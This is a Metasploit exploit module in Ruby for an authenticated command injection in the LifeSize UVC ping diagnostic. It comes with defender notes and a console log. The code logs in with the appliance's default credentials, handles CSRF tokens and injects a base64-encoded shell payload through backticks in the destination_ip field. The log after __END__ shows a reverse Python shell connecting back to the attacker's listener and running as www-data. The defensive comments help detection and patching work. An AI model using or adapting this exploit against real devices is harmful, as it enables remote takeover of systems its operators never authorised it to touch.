##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
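require 'msf/core'

# Metasploit module for an authenticated command injection in the ping
# diagnostic of the LifeSize UVC web administration interface (the declared
# target is "LifeSize UVC version <= 1.2.6").
#
# Flow, as implemented below:
#   1. GET  /accounts/login/ to obtain a CSRF token.
#   2. POST /accounts/ with USERNAME/PASSWORD to obtain session cookies.
#   3. GET  /server-admin/operations/diagnose/ping/ for a fresh CSRF token.
#   4. POST the ping form with a backtick command substitution placed in
#      the destination_ip field.
#
# Defender notes:
#   * Root cause (inferred from the request shape): destination_ip reaches a
#     shell command line without validation. The fix on the server side is to
#     accept only a strict IP/hostname and to invoke ping without a shell.
#   * Detection: POSTs to /server-admin/operations/diagnose/ping/ whose
#     destination_ip contains backticks or other shell metacharacters.
#   * Exposure reduction: the request needs a valid login, so rotate the
#     administrative password and keep the admin interface off untrusted
#     networks.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Hidden form field carrying the CSRF token (csrfmiddlewaretoken is the
  # field name used by Django's CSRF middleware). The capture stops at the
  # closing quote so trailing attributes on the same line are not swallowed.
  CSRF_TOKEN_REGEX = /name='csrfmiddlewaretoken' value='([^']+)'/

  # Registers module metadata and the TARGETURI/USERNAME/PASSWORD options.
  #
  # @param info [Hash] metadata overrides supplied by the framework
  def initialize(info={})
    super(update_info(info,
      'Name'           => "LifeSize UVC 1.2.6 Authenticated RCE via Ping",
      'Description'    => %q{
        This module targets an authenticated command injection in the ping
        diagnostic of the LifeSize UVC web administration interface
        (versions <= 1.2.6). After logging in, it submits the ping form with
        a backtick command substitution in the destination_ip field. Valid
        credentials for the web interface are required.
      },
      'License'        => MSF_LICENSE,
      # NOTE(review): the author list is empty in the source; fill it in
      # before the module is submitted anywhere.
      'Author'         =>
        [
        ],
      'References'     =>
        [
          ['URL', 'http://pastebin.com/FueRwWhe']
        ],
      'Platform'       => ['unix', 'linux'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['LifeSize UVC version <= 1.2.6', {}]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python telnet netcat'
            }
        },
      'DisclosureDate' => "Mar 21 2014",
      'DefaultTarget'  => 0))

    # NOTE(review): the USERNAME/PASSWORD defaults are presumably the
    # appliance's shipped credentials (confirm against vendor documentation).
    # If so, an unchanged admin password makes the "authenticated"
    # precondition trivial, which is the first thing a defender should fix.
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
        OptString.new('USERNAME', [true, 'The username to authenticate with', 'administrator']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin123'])
      ], self.class)
  end

  # Extracts the CSRF token from an HTTP response, aborting the module with
  # a descriptive failure instead of raising NoMethodError/TypeError later
  # when the request timed out or the page has no token.
  #
  # @param res  [Object, nil] response returned by send_request_cgi
  # @param what [String] human-readable name of the page, used in messages
  # @return [String] the token value
  def csrf_token_from(res, what)
    fail_with(Failure::Unreachable, "No response when requesting the #{what}") unless res

    match = CSRF_TOKEN_REGEX.match(res.body.to_s)
    fail_with(Failure::UnexpectedReply, "No CSRF token found in the #{what}") unless match

    match[1]
  end

  # Logs in to the web interface and submits the ping diagnostic form.
  # Every response is checked before use; the original dereferenced `res`
  # and `$1` unconditionally and crashed on a timeout or unexpected page.
  def exploit
    # Step 1: fetch the login form to obtain the initial CSRF token.
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/accounts/login/')
    })
    token = csrf_token_from(res, 'login page')

    post = {
      'csrfmiddlewaretoken' => token,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    }

    # Step 2: authenticate. The token is sent both as a form field and as
    # the csrftoken cookie, together with a matching Referer header.
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/accounts/'),
      'method' => 'POST',
      'vars_post' => post,
      'headers' => {
        'Referer' => 'https://' + datastore['RHOST'] + '/accounts/'
      },
      'cookie' => 'csrftoken=' + token
    })
    fail_with(Failure::Unreachable, 'No response to the login request') unless res

    # NOTE(review): login success is not verified here; a rejected login
    # surfaces as a missing CSRF token on the next page.
    cookie = res.get_cookies
    new_cookie = 'csrftoken=' + token + '; ' + cookie

    # Step 3: load the ping diagnostic page for a fresh CSRF token.
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/server-admin/operations/diagnose/ping/'),
      'cookie' => new_cookie
    })
    token = csrf_token_from(res, 'ping diagnostic page')
    new_cookie = 'csrftoken=' + token + '; ' + cookie

    # Step 4: submit the ping form. The destination_ip value carries the
    # backtick substitution; the response is not inspected.
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/server-admin/operations/diagnose/ping/'),
      'method' => 'POST',
      'headers' => {
        'Referer' => 'https://' + datastore['RHOST'] + '/server-admin/operations/diagnose/ping/'
      },
      'cookie' => new_cookie,
      'data' => 'csrfmiddlewaretoken='+token+'&source_ip=' + datastore['RHOST'] + '&destination_ip=go`echo ' + Rex::Text.encode_base64(payload.encoded) + '|base64 --decode|sh`ogle.com'
    })
  end
end
__END__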
msf exploit(lifesize_admin_ping) > show options

Module options (exploit/linux/http/lifesize_admin_ping):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin123         yes       The password to authenticate with
   Proxies                     no        Use a proxy chain
   RHOST      172.31.16.99     yes       The target address
   RPORT      443              yes       The target port
   TARGETURI  /                yes       The URI of the vulnerable instance
   USERNAME   administrator    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.31.16.166    yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL  /bin/bash        yes       The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   LifeSize UVC version <= 1.2.6

msf exploit(lifesize_admin_ping) > exploit
[*] Started reverse handler on 172.31.16.166:4444
[*] Command shell session 3 opened (172.31.16.166:4444 -> 172.31.16.99:42603) at 2014-03-21 11:02:43 -0700
bash: no job control in this shell
www-data@fdsa:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@fdsa:~$ exit
[*] 172.31.16.99 - Command shell session 3 closed. Reason: Died from EOFError
msf exploit(lifesize_admin_ping) >